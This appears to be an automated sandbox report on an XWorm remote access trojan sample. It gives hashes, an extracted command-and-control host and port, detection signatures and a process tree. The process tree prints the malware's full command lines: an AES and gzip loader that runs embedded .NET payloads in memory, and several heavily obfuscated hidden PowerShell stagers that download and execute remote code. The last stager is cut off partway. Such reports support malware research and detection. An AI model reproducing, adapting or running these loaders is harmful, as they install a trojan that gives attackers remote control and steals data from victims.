xworm | af741ad4ad174cdcbea9fcfaf76b68ba4ee38168b21248d5e9ce244ddf4073e3

Analysis

max time kernel
18s
max time network
22s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
22-05-2024 00:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sample.cmd
Size

82KB
MD5

4ab6133a95c1cc4bf865b0eb5de71ee1
SHA1

de046f1c2516b909e2582bf72c7bf03944350991
SHA256

af741ad4ad174cdcbea9fcfaf76b68ba4ee38168b21248d5e9ce244ddf4073e3
SHA512

9ce2883d993e3f26681194a7b14fd0b85a5886e68da55f6565b14d838f466ee62f24c575517aed3cc63cdcb56d773f49fa6f19d4e93c102d9f07e071578f2bdd
SSDEEP

1536:gauHfl8HCHpbiyGGy+aq/ewn9utsxqdr3hyRLXrxHaq8AdIOGB:huHtoC2GFZGwn9utsCr3uxEMds

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

x5387400.duckdns.org:8896

Mutex

F4ssR8b386Bj6q2g

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/728-18-0x000002D2B0810000-0x000002D2B0820000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 728 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

8 powershell.exe
1500 powershell.exe
2384 powershell.exe
1748 powershell.exe
728 powershell.exe
2812 powershell.exe
4388 powershell.exe

flow	pid	process
3	728	powershell.exe

pid	process
8	powershell.exe
1500	powershell.exe
2384	powershell.exe
1748	powershell.exe
728	powershell.exe
2812	powershell.exe
4388	powershell.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
728	powershell.exe
728	powershell.exe
728	powershell.exe
4388	powershell.exe
2812	powershell.exe
2812	powershell.exe
4388	powershell.exe
8	powershell.exe
1500	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	728	powershell.exe
Token: SeDebugPrivilege	4388	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeDebugPrivilege	1500	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

728 powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

cmd.exepowershell.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1184 wrote to memory of 4672	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 4672	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 1388	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 1388	1184	cmd.exe	cmd.exe
PID 1184 wrote to memory of 728	1184	cmd.exe	powershell.exe
PID 1184 wrote to memory of 728	1184	cmd.exe	powershell.exe
PID 728 wrote to memory of 3100	728	powershell.exe	cmd.exe
PID 728 wrote to memory of 3100	728	powershell.exe	cmd.exe
PID 728 wrote to memory of 2116	728	powershell.exe	cmd.exe
PID 728 wrote to memory of 2116	728	powershell.exe	cmd.exe
PID 3100 wrote to memory of 2812	3100	cmd.exe	powershell.exe
PID 3100 wrote to memory of 2812	3100	cmd.exe	powershell.exe
PID 2116 wrote to memory of 4388	2116	cmd.exe	powershell.exe
PID 2116 wrote to memory of 4388	2116	cmd.exe	powershell.exe
PID 728 wrote to memory of 4768	728	powershell.exe	cmd.exe
PID 728 wrote to memory of 4768	728	powershell.exe	cmd.exe
PID 728 wrote to memory of 3308	728	powershell.exe	cmd.exe
PID 728 wrote to memory of 3308	728	powershell.exe	cmd.exe
PID 728 wrote to memory of 4964	728	powershell.exe	cmd.exe
PID 728 wrote to memory of 4964	728	powershell.exe	cmd.exe
PID 728 wrote to memory of 4636	728	powershell.exe	cmd.exe
PID 728 wrote to memory of 4636	728	powershell.exe	cmd.exe
PID 4768 wrote to memory of 8	4768	cmd.exe	powershell.exe
PID 4768 wrote to memory of 8	4768	cmd.exe	powershell.exe
PID 3308 wrote to memory of 1500	3308	cmd.exe	powershell.exe
PID 3308 wrote to memory of 1500	3308	cmd.exe	powershell.exe
PID 4964 wrote to memory of 2384	4964	cmd.exe	powershell.exe
PID 4964 wrote to memory of 2384	4964	cmd.exe	powershell.exe
PID 4636 wrote to memory of 1748	4636	cmd.exe	powershell.exe
PID 4636 wrote to memory of 1748	4636	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sample.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:1184

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
2⤵
PID:4672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SNcpK/HnVKH1IcmVXq5GXLsK0F2PtPK0jJvWxkNJxP4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LIEkUluNaGMty/TPEivl8Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rPECe=New-Object System.IO.MemoryStream(,$param_var); $PuqgX=New-Object System.IO.MemoryStream; $UxpVS=New-Object System.IO.Compression.GZipStream($rPECe, [IO.Compression.CompressionMode]::Decompress); $UxpVS.CopyTo($PuqgX); $UxpVS.Dispose(); $rPECe.Dispose(); $PuqgX.Dispose(); $PuqgX.ToArray();}function execute_function($param_var,$param2_var){ $zkkcW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $glrjC=$zkkcW.EntryPoint; $glrjC.Invoke($null, $param2_var);}$BrZZW = 'C:\Users\Admin\AppData\Local\Temp\sample.cmd';$host.UI.RawUI.WindowTitle = $BrZZW;$roNQn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BrZZW).Split([Environment]::NewLine);foreach ($HKtqx in $roNQn) { if ($HKtqx.StartsWith('mxoRkNYapFgZWtjqYinS')) { $IZNFk=$HKtqx.Substring(20); break; }}$payloads_var=[string[]]$IZNFk.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
2⤵
PID:1388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iqaeqv.cmd" "
3⤵
- Suspicious use of WriteProcessMemory
PID:3100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Ridderviserne = 1;$Spydkastene='Sub';$Spydkastene+='strin';$Spydkastene+='g';Function Ruiner($Gripers){$knudernes=$Gripers.Length-$Ridderviserne;For($Registermarkeringernes=5;$Registermarkeringernes -lt $knudernes;$Registermarkeringernes+=6){$Negligence+=$Gripers.$Spydkastene.Invoke( $Registermarkeringernes, $Ridderviserne);}$Negligence;}function unsupernaturalized($Saatning){& ($Diaguite) ($Saatning);}$Anaesthetizing=Ruiner 'GenbrM AsymoOverszUnt aiRestglFran,l Phala Pa.a/Beath5Skrek.Dybh.0sides Lege(Ant.kW PaakiPam.inSvinsd,avseo.ortywdefeksHek a SyssiN ScraTnon.c D,ma1P.rad0Seg.e.Fucoi0Ste c;Monor StannW Odonicertin Nabo6Uford4Kitch;xy of Underxprakt6Charl4Subve;Undes SlgtsrEmb,svPa.ud:Liqui1 Long2Laksh1Tyve..Oplev0Ha ga)Kns o skumsG rseleBes,ocblodpk Ned,oRed p/Com l2Dates0Arche1snot 0Jongl0 lump1yde p0 Attr1Havan ,llegFSr.stiScandrPredee Ud.of,ordeoErichxSelvo/Ma on1Steti2Spy.l1Forva. Sy,t0Ib re ';$Interimistical=Ruiner 'Amt.dUAdte,sL,vmoeLemurrInj.r-EnaktAGa.ang .orhe DolbnUniaxtCocke ';$Halocline=Ruiner 'R,numhundert Stret Ma.kp Uns sTippe:K,igs/ oryp/Foyerw GlauwKllebwTe.ti. UnslsIndkbeMopoknHintedNamelsGromap handa F.skcHourseProce. Sekuc,edrioHangam Reve/C.lorpSalutrTilgio ford/consadE.ikkl Ppha/,essi3SuperunibblpCamouzCastibSub r7 Tomk ';$Bazzite=Ruiner 'Lill.>Bites ';$Diaguite=Ruiner 'N.craidumpieFun.ixS,lde ';$Preoperated='Vinhandel';$Bandsatte = Ruiner ' BerteVisa.cFrerghN.turoForva Rheol%Nonsua Tilpp HeadpSequadDank,aFormat.osgiaTroca%Demes\SyvaaS Testt,andhrApoteiFor,ngNa ors Rede.FrilbSOldtivFlavoaSkovd Domo.&bo,it&,zoti V,cuoe ongcUninihoutkioMusc, su pltDieth ';unsupernaturalized (Ruiner ' Bekv$Snd.rgParenlCo.ploRu,tvbStraiaDommel .ree:TrefoIKa tolQuinolFunktuA,kers otoniO.krioPar.on GsliiNoncrsGrov.m,elbr=Subcu( DisicKoagum ldhed .itb Trest/MulticLsla, Pl te$PrydeBDesulabelssnStoevdPok.rsSpejlaGanoitJoviatUnkeneDisci)rehea ');unsupernaturalized (Ruiner ' Plan$ MegagRobuslIndoco.gekobHet,raPunisl uadr:FixatWLavvrhOmfaniOverttStille KimbyNonins,omme=Lobel$ tvkoHsal.ma,recelUopdrolmle cIntellVejsyiRebelnStapheUn.oo.LitacsU.venpSkolelUna ji indut ,dbl(Stabi$HovedBOraclaUvornzC,antz PateiCl.ritDaabseSpydb)Bron. ');$Halocline=$Whiteys[0];$Hansom= (Ruiner 'Orch $ Pibag Noncl,lexiosynodbfrem,aElectlConc,:fodfsSImambtParaseAdvisdDe posBe lua vin,nAnalogCruddiEpsomvElecteNonorlDdvgtshardfe Roma=de apNP rcue Nonow Bibl-YachtOBi,pebKerosjStre eForlacRilietCrani BastaSs,eghyK,asss Omo,tPo oseNetfumFiree.Bet eNKnortearrigt,iqio.Soi,iWOve.re SkrdbstjedCJernblAftesiI.dsme lithn ,oiet');$Hansom+=$Illusionism[1];unsupernaturalized ($Hansom);unsupernaturalized (Ruiner 'yderr$DobbeSKlejntisogleImpold s,vlsUds na Sor nDispagDiskfi SledvpledgeUnlealFllessTo.heegarag.Fo,smHBldg eEpi.pa,egnedvirkseEfterrSyndisVrdia[,asta$ PolyIR.vninMyrmitStanneAfmrkr,ndifisubdimSidesiB spasSi.ict S,abi.actecRelh.acuraclQuinq]Lepto=betnk$Haem,ALudibn euraNau aePasses I,prthestehIm.dneSnesptKenneiHeadgzUncatiunjurnFrgnig Hres ');$Atemidorus=Ruiner 'Melle$KhediSJugglt StereMythidassi sLakriaHugtan MedlgTomm.iBunkrv R seeOpgrelC.cais F,skePrece.Fr,stD Cel.oRe.erw SvmmnFlj,slSubproM.ksea SpendK ifeF.mmariTrichl FedeeTereu(Besvi$Ove.tHkonjea empelClaudoCastucSkocrlIndskiAn,ivn torneprint,Actin$TredkEInterfChewet Tva,eWryn,r F lmgKaut.rimponeSupra)Gra,n ';$Eftergre=$Illusionism[0];unsupernaturalized (Ruiner 'varek$ UsmagBegralU.deroSmrekbLeonoaBr.delInter:VidneGNets,oDiletbfj rniTa gsiPap.lfOffero SydvrF relmOrogee S.agsIncor=Ler,o(PortiTUnp ie ,rigsRensdtGbakk-BllemPSa meaSnylttErnrihToldb Lucer$SommeEenganfVolittTaraneKilovrStramgudannrEdifieen.ui)Tatt. ');while (!$Gobiiformes) {unsupernaturalized (Ruiner 'Blu c$EightgAcromlKnivko tuebStaalaUndrelf lms:Dag.lB.ndtalIntruiA tiunHalshkPhlo e OvoctBegynsIndis=Hugeo$Klkr.tHeft.rmisleuSjleseA.biz ') ;unsupernaturalized $Atemidorus;unsupernaturalized (Ruiner 'KujonS FructMyonea Obs.r fermtStjvi-MinchSSultalIndsaeHjarneFeticp,raab Paces4 S.ar ');unsupernaturalized (Ruiner 'tipol$TritogP.imrl H.booAgam.b Cub,a s,ell Butt:BlossGConv.oSpecibForanipodopiIs hif .yreo SprerInvenmCorbeeB.ltssskalk= ,rnd( BlokTE,toneNapolsLatintNonno-LynhuPR,metagenfotOverfh pili Trol$Sper.ESkraafvictotGeneteRo,kerCosmog .mfirSnu.teDokum)Appl. ') ;unsupernaturalized (Ruiner 'Judic$LigeggRingslDampboImperbDe oma Allol Reko:Ud.alSSpi.ltF,rree nergmAntisnBughiiMob inOprykgtale s VerdmB edbe Di,inanna,nsalmoeZoomos as,pkFasthe JigatUr.ph=Ox.dm$ ysmogIndsplTrafioVenstbRetaraAbdiklKonst:GainaTReseriMaademSt,rtiOmsornFort,gFrsteemarecn Rems7milie3 Euro+U ven+ Theo%N nac$FavelWdelelhConsaiStan.tU.iyoeslashyMe eosBumme.Re.tacMbdunoBoae,u EditnHymentTasta ') ;$Halocline=$Whiteys[$Stemningsmennesket];}$genbruget=324281;$opvejningernes=28269;unsupernaturalized (Ruiner 'Ha,ve$Alt,ggUnspllAfsteo Eu,hbHjemgaTimeblHesit: Ov.rDIndsioDamndmStabesBer au Skind BangsGruppkGnierr H.skiCom,ifStttetIn,visGasbe Anda =Pe.ma LyonsGTek,ieKaraktB ogu- .uctC Alc.oLanamna,chitTroweeUvornnFascitFlare Scots$KarakE singfPartitSkat,eHotchr CircgPreo.r.elime.nsoc ');unsupernaturalized (Ruiner ' Bort$ No rg,ognelUformo TichbUnr faDokumlsa sg:Koec UBord,n Le td Pai uFyr el SkokaAngelt .ipiespkkelIonisy Re.a1Forme4 Glan1 Da t In.tr=tauro Rtebl[unremSF,wniyChilbsBifent BaseeSk.inmA ntt.PorteCTrykloClypen SidevmourieTrumprRealltNephe]Apo,a:O.iga:NonacFSkridrEft,ro rettmHyposB,lcahaInf,rsTap.teS,ors6Lyri.4 Di.eS SkritStercrkrymmiRum.tnda atg F.yg(const$AvertD Mixao Dybsm MotispurifuOuts,dMisfosSollykcercir Av.siSchizfme.metErucisKdbol)Dedit ');unsupernaturalized (Ruiner 'Forls$ For gVersilR,busoSide b ans.aOutb lBu.ke:Resu.Gopgr,i Kor.lSkrifdPolyci Nicon.kunkgBipe, Newsp=Koldf Sashi[CurinSNrts yRustbsTegnitBesseeWoodcmBatwi.BrobyTHem leMuskixbaadetFalla. CrypE SiminCephecMistnoPerifdKlammiCyclanLbningOpfun].ervi: Mu.t:SquatADep,cSM galCSprogI misqIF.nkt.Who,eGJillieKarewtNark.S styltwhiterSnapbiVarmbnKrigeg Klam(S lec$ SancUdamasnEnsuedAnatou Phosl V,llaPri,stRefuneLrerilW ldlySk,le1Rejer4 elsd1 Efte)Cockn ');unsupernaturalized (Ruiner 'Backh$ Ru,kg,inimlDrkaro di,tb Par.aSkildl usca:ObersARutedd .spivUndoniEva.usUnstueFask,nreilas Type=Repro$TekkkGFormgiKampalUnprodO,erpiGordan,edatgakt v..onassBakkuuAndrob UndesShunttBr.karForsgiAtossn Travg Rese( Co.l$MichagMousseMellenHemmebNonver,nheauCruengProseebrodntS,pon,Cany,$nonreoDistrpDeysbvAf ageProtojPse,dnRaketi Arzanadverg otoeTr ncr tempn.egnse StersCrepo)Se.vi ');unsupernaturalized $Advisens;"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Strigs.Sva && echo t"
5⤵
PID:1656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cegtcm.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$aftrdelser = 1;$Possessed='Sub';$Possessed+='strin';$Possessed+='g';Function Slinge($Digtanalysen){$Anciennitetsbestemt=$Digtanalysen.Length-$aftrdelser;For($Skorstenspibes=5;$Skorstenspibes -lt $Anciennitetsbestemt;$Skorstenspibes+=6){$Lyskopiers+=$Digtanalysen.$Possessed.Invoke( $Skorstenspibes, $aftrdelser);}$Lyskopiers;}function Ordkriteriers($Tummelen){. ($aline) ($Tummelen);}$Loddemaske=Slinge 'KogefMBort oUnm rzIn.esi ammel TranlOverkaTop s/ ar.l5Studi.Caser0 ,eoh Land(KnifiWSeieriBrugbnJgerkd V.rnoA beswMed csVanad varmeNP.ereTHardi Beaut1 Back0,kraa. efte0 Flit;Platy ForeWUnderiInklunCle.n6 Sphe4siben; Palm HasntxStime6Dv sk4 Skal;C.sti RigidrYnglev Mari:Ledde1P,lem2R bla1 C.ac. Supe0 Im,g) Divo DesisGPremueBy oncSpectkC,orioOverc/Assur2Mario0Bifil1Fac o0Bon,v0Fordu1 Scho0Dis,e1Skive ToyisFUrsb i piphrErodee,nvulfSlimeoTelexxRised/Kitam1 uldt2Ira.i1 Sali.Ass,z0 reba ';$Udvlgningens=Slinge ' SkolUO hugs Pix eA.kvirAndro- AmplAp,laegPunkte Gynan Advotopgav ';$Overenskomsten=Slinge 'SlrhahDebuttDaglit.ndsppmeninsTermi: eko/Fo,sk/ ,araw Uddaw DownwDari .KlerksUneneeOp,renWiverd Acr,s BurdpB.rusas.ratcP,tkie.aran.Akko cJannioJunkemEjend/Kand,pGl.srrQuadroseque/HvinedMiterlRhein/MyresyGaslizFiskenUdfrs0flowfkCyclofCr.gg ';$Posturized135=Slinge 'Mo,en>Vd,el ';$aline=Slinge 'Dagg iRen,re Pionxdispe ';$Taaregassens='Ressentiment';$Agenting185 = Slinge 'Intare runcBookih unifoDrl k Sorth%S.edbaGarv pProlepSvumpdOrchia Con tSy.agaD,abe% ,ric\OptanSMic.aa R.penNo,aumF oraa F,lmrKrumsi P rln ainbeBd llsProfeeChol rStemm.AfledDRe,uliskibsaMyt.l Lucas&Hypot&R lat VioleBradyc BasthRem.toDevil Rigsft Entr ';Ordkriteriers (Slinge ' Pr g$ Flo,gSad.elAgar.o S.lebRibosa nutcl,onti: D ueDAunelrO evetUncorrPikniiPla yn Pa.meSi.fin O,yceSprn.=Suite(IndkocBlndfmFelthdCoros Poly/Ex olc ila Dokum$ Pa.aAH.waigRig,de XeronJulemtBor,sist.munUpseag S mp1Fibri8.vali5Anana) Not. ');Ordkriteriers (Slinge 'Helga$Audifg Lom l ForuoTroc,bSstteaChroml Ma k:tor egAvenorU,punaEskima,hurcl .krai hiangFysiotHankn=Fljte$M ranOVaadovDalgaeFiltrrEnetiePinctnVenussFiliak nvieoFarvemBikarsEt.ket skineReboun nder. Inc.s FilepSp,nglPatheiStreatBrstf(Bovej$ .refP osio UnresPharytUn eruQuestrLitteiUnhapzHerome E,endKejse1R,mme3Envo,5.ubko)Overf ');$Overenskomsten=$graaligt[0];$Jazzmusikeren= (Slinge ' Gypt$FestugIdiotlSyntaoFan,ab.lveoa Grinl Mist:TalendUsta eChapelKombiiPrivirfastgsInamoeHeigh=KraftN bavneQuillw Ufs -JambeO.lyksbNonc jS aggeAcicuc Tilst Impe SubgaSSerolyLev,rs,haettUmeddeNonexm Ward.AntitNPinboe BrantUm.nn.BiggyWAr,hieCathab,laavCSignalMegadino,creCa nenJoltit');$Jazzmusikeren+=$Drtrinene[1];Ordkriteriers ($Jazzmusikeren);Ordkriteriers (Slinge 'Datas$Raided.rakee InstlCrotciStentrP,nedsWellseGambl.F.skeHmicroe IritaKursudTchrre,ilkir HymesArvin[Sv.rp$Voll,U BiovdVerbavWalbolkatieg,rogrnBibliiSprawn A,osgPomadeNonoxn G.nosRura ]Candl=Ebdr $ S.krLLnstio Taiwd D.vidrecoveTubolm,dvejaN ndes LasekDurioeA tit ');$septennary=Slinge ' Winl$Vitted TubueObserl KontiFrastransersOve,geKawik.heterDPie,rova,utwExponn An.ilpo.reobunodaEtymodTal,nFSomnaiTilkmlOa lee Biga( Nati$rdderODiskuvProfieDesigrosteaeTryllnCacoxsSamfuksinifoSttysmPro.esU,cont TungeSadelnRygte, Unad$ MaltL OffpiPregnvTarsee,anchsAnathhStad,o RotiwTrafisFintl)Unspo ';$Liveshows=$Drtrinene[0];Ordkriteriers (Slinge 'Ove.s$L neag MostlKommuoNeurobGipsea GushlIndex: CitiTPo yhiPneuml Mor,lNeotri GersdSchilsEnhedeRa.onr lactk,ttedlFormarTric,iBusc nSwantgChlame ndrenTids,sPolym=Psyc.(PortiTDisp,eTenebsb.avot Comp-Ret iPStanda SaxttCapt.hAlkal Egnsu$TaaleL BecaiGennevPerioeCoc.lsRecarhUnph,o UnrewFlotts ensy)Altru ');while (!$Tillidserklringens) {Ordkriteriers (Slinge ' Vand$Hvo,mgReartlLrkeroAecidbKo.orabremslNeeng: ThebdRadieeSk.ttn ju td tot,r SlavoInterltilple Udsan RnkeeVa.vi=urosi$OccastC angraffaluHo edeMitri ') ;Ordkriteriers $septennary;Ordkriteriers (Slinge 'SvumnSDi oltUnimoaPygoprIn.urtaf if-PropiSPostilVandke,cordeSingupFrger Reli4Lamed ');Ordkriteriers (Slinge 'Tilhu$ S megHand,lKnivsoSachabFremkaUt rol Om y:InhesTversfiVagtsl Bev.lDi,loiOverpdNik ns Mot,eSpe,krStjerkPeriplReasors.enei clernViderg bantespdl ntrykls,arif=Sejlf(Re slTS rfbe CcwssT,lfotFasts-SlvalPNitroaunsoltEn,ochSkrek Ou re$BagtpLBetatiSy,krvUndskeP.rtisF.erbh GrskoRecalwByfors.danc)Misga ') ;Ordkriteriers (Slinge 'odedh$Misk,gPontolG.odlohi hhbSu,ksaAzooslYen,r: Borts Forvp Raa.u sinit NeutnHoldei Kot.kSammekSeriaeZa,airHa.issUnqui=No.na$Bes,ngHepcalAfskro OverbAlbreaA owilPassi:DyndeT A,kyoKr dsrCa nosForhai M nioLoftsnovergsLse.oaAttacfCa difSpe,ijTrav,e l.kkdRe.iorCatriiare ln.iblegB,odes ,hyr1Dynge9,dspr3Speci+ Hy o+Lati,%Aktiv$Fe.nwg Skilr NitraInc da Pr slHasidi.ambrg V potDi,ma. ForecStrafo Boreu Gr nnNonstt Klar ') ;$Overenskomsten=$graaligt[$sputnikkers];}$Ratifying=340424;$Brugtbil=29765;Ordkriteriers (Slinge 'akkil$sagangPso ilTagpao earbbErnria UnrelEvane:Mi.deAPothos orwsAbsoleUnlevrgrypht HandiUndervAeroteDup.e2Pbela3 Sha 4Tr se Antyd=Th om LovnsG PlaseFr tit akte- Fe nCU deroAnbefnDa,setordhoeTrok,nGamintDhaks spro$OveriLdownsiover vPol,pePest sR.ffah,avstoSalsiwAlliosVouch ');Ordkriteriers (Slinge 'Pipie$Ste ugCholilUnderoNyh,dbElecta .idslKo le:ZusanS T,olm Mat,a OveraHirselKlageaOneranToldsdEmfassDdsdah Rigtali.vivrodomeKloakt ildksAktie Midde=P tib Gori[a.kalSOrbley Wee,sL.vsstOrangeAdvowmvivos.PicklCDybgaoSa,menBe,apvAlmaieMaizer kldtTrkke]Reci.: Kil :SangeFJetonrrealloGrangmSvejsBStig.aKonaks G ddeH.rit6Rvrdi4Ka,liS DidntSt mpr illoiInternZinkbgVgko (o,tbi$Q.inqACleeksGildesMolsceForesrF.abbtB rkai fo,bvB edbeCount2Smal 3Brais4Skraa)Be po ');Ordkriteriers (Slinge 'Ko,mu$,unicgMackil TandoLiv tbti.liaScapplWhisk: ConcKEpoxyaA.rcra R,bulsterisFaggooKura.mlac,omMiljfeForlyr,ubinfSemituRein.gOverclA,gle Uros.=fange Ejerk[SportSCavaty KatmsSarcotH.nste ReatmSuper.Rbd.gTtremueBedrax Affat Simu.LifelE.kkennBroencJean o SuppdGaardi KonsnFrtidgNewsm]Sprge:Lgna.:StedbA HejsSCountCUrinaIPr.miIFoote. QuieGSauceeLubrit estiSChinctKlagerRarieiSjasknNovelgUnsal(Epini$Komm.S DehumChefdaKrebsa,tranl Sge.aTved n All,dSt,egsDamprhOpvakaWrongvW,lfdeEbbint DombsU.luf) stea ');Ordkriteriers (Slinge 'Sendi$SakkagNaboblWifocoThaumbGengiaPorcelGraph:ssygtBOv rsy Repeg ,uronZakiaiQuom nNonasgS,persKl.geaC.njufCe.ntsprojen ifidiUn.utttidyi=Passe$GinglKStormaOv,rcaKaffel Ma.psMu suo.aroimE issmAutoreUdsttrGen.sfG ldeuRdkrigPan elM sau.ChampsBgegruJo dtbTricosManlitAutomr SaxhiStrobnAstergKrmme(Lucri$invesRDe era Joint assiSpi,kfJambsy Tilvi BanknAnlg gCause,Ungil$UdsulBBedisrSkvviuOmgang MammtgrisebSeawaiActinlscape) .mov ');Ordkriteriers $Bygningsafsnit;"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4388

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sanmarineser.Dia && echo t"
5⤵
PID:868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\izmcld.cmd" "
3⤵
- Suspicious use of WriteProcessMemory
PID:4768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Kapitaliser = 1;$Jeremiad='Sub';$Jeremiad+='strin';$Jeremiad+='g';Function Plastochondria($Volumenrabattens){$Goodsome=$Volumenrabattens.Length-$Kapitaliser;For($Stridshandske=5;$Stridshandske -lt $Goodsome;$Stridshandske+=6){$Sneglegangenes+=$Volumenrabattens.$Jeremiad.Invoke( $Stridshandske, $Kapitaliser);}$Sneglegangenes;}function Mrkerddes($Allergitestede){. ($Drudefod) ($Allergitestede);}$Impetuoso=Plastochondria 'Bul,iMCraigo ChaszFjortiPs.udl Mu.flskolea Cinc/Cider5Calci.Abrik0 elli Jo dt(R.vhuWSor niReminn P sfdHeracoRearowNummesChres StrudN UdkeTPig k Fi,se1Cent.0Afkld.Engge0Entel;Celeb ExcluWOrlogiS reanSubme6.ecis4Deli.;Satir M.nnex f,er6Kages4 E,ri;Coxc. vddelrBrugevHarve:Sk rp1 Comm2 C,lz1Torde.Sprng0Valha)Udenr ,pinoGBankfe PhalcS,nuskFedteo Mary/Indus2 ,amf0snack1R,ndo0 Syst0Depri1Hedo.0Whida1Saxon SponF Pinci,amarrU spre vggefGhettoUnjudxNumb,/Sub q1Udsky2Chefg1 Esc,. Koso0 Kbm ';$Trekvartlange=Plastochondria 'ArkivU ataks.estreH.drir ,our- TolvAFremsg JuareBrunsnTaxertFejlb ';$Cavicorn=Plastochondria 'f rebhargu.t Epitt CornpP alis.uldb:Recal/ ,onf/ UnalwBredtwZit aw Biff. .kmisalkohe PolynskadedForkos UnprpDokumakat ocPrepae Slan.BafflcprovioWeepimAnsjo/ TogtpCorbirUnstaoCondu/ empdVulkalMelle/SisuetProgrgO,erd5PurlmnBl.et9T.anshEnjam ';$Huleboeres15=Plastochondria 'M,rbr> U ka ';$Drudefod=Plastochondria 'Me.hyiWea.leDing.x Funk ';$Flaunter='Military';$Acronal = Plastochondria 'temp.eInf,ecHispah Di ho Dags ,aml% BedraFejltpUdskipJu,epd achaa UndetSkimlaForeg%Anth.\Narc SOutrseNonsemMuldviSul,in HendiTisseffolkeiGenn,cVeteraRemitlOcto..Au.uhVdeducaPict.sEmbos Valse&Gs,eo&suing Spione bl.ucOrigihJappeoSekre SamlitSvveb ';Mrkerddes (Plastochondria 'Escro$.atiegUbesvlRos,no Overb.nifiaWavellInsur: SunkS A.iswPreinaNongatDi.grhAseitsSket.=Ce tr(Prer,cRuellm,lterdPuyao Jo,fr/Outt,cTwank T.van$ ,lekALeechcRotterHungroopmunnForsoaStom lOverr) soma ');Mrkerddes (Plastochondria 'Outwo$ Ma rg Bee l InteoSagslbHrgpia Hvi,l Gala: tireCJoylerpookhi umaan Sha.oRhymegAjleseNejsinD.mpei BagscUnmom=Sketc$BortsCT,ggeaTalmuvEskapiFrowac BengoD.hydrUs.mmnDisj,. ujaesKrumspBesinlOzostiWith,t Rott(Beedi$ PereHTromsu OpgaltralveDoerebBefugoOlivieHa.chrGipsseOb,eksIndus1 spec5A veh)Denat ');$Cavicorn=$Crinogenic[0];$Udviklingslinje= (Plastochondria 'Diali$El,tsg Agg.lFotogoAsp.ebSu,icaPresclSanip:bi,slP Kad iN nsucFrak 